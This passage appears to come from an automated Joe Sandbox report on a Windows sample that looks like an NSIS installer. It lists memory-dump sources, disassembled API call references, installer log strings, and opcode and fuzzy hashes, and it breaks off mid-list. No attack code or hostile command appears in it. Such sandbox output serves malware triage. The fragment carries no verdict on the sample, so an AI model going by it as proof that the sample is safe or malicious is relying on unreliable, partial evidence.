                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                  • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                  • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                  • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                  APIs
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                  • String ID:
                                                  • API String ID: 4115351271-0
                                                  • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                  • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                  • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                  • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                  APIs
                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                  • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                  • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                  • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                  • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                  • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                  • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                  • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                  • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                  • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                  • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                  • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                  • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                  • DeleteObject.GDI32(?), ref: 00404A79
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $ @$M$N
                                                  • API String ID: 1638840714-3479655940
                                                  • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                  • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                  • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                  • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                  • String ID: 82D$@%F$@rD$A
                                                  • API String ID: 3347642858-1086125096
                                                  • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                  • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                  • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                  • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                  • API String ID: 1916479912-1189179171
                                                  • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                  • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                  • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                  • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                  • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                  • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                  • FindClose.KERNEL32(?), ref: 00406E33
                                                  Strings
                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                  • \*.*, xrefs: 00406D03
                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                  • API String ID: 2035342205-3294556389
                                                  • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                  • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                  • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                  • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                  APIs
                                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 3581403547-784952888
                                                  • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                  • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                  • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                  • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                  APIs
                                                  • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                  Strings
                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                  • API String ID: 542301482-1377821865
                                                  • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                  • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                  • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                  • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                  • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                  • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                  • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
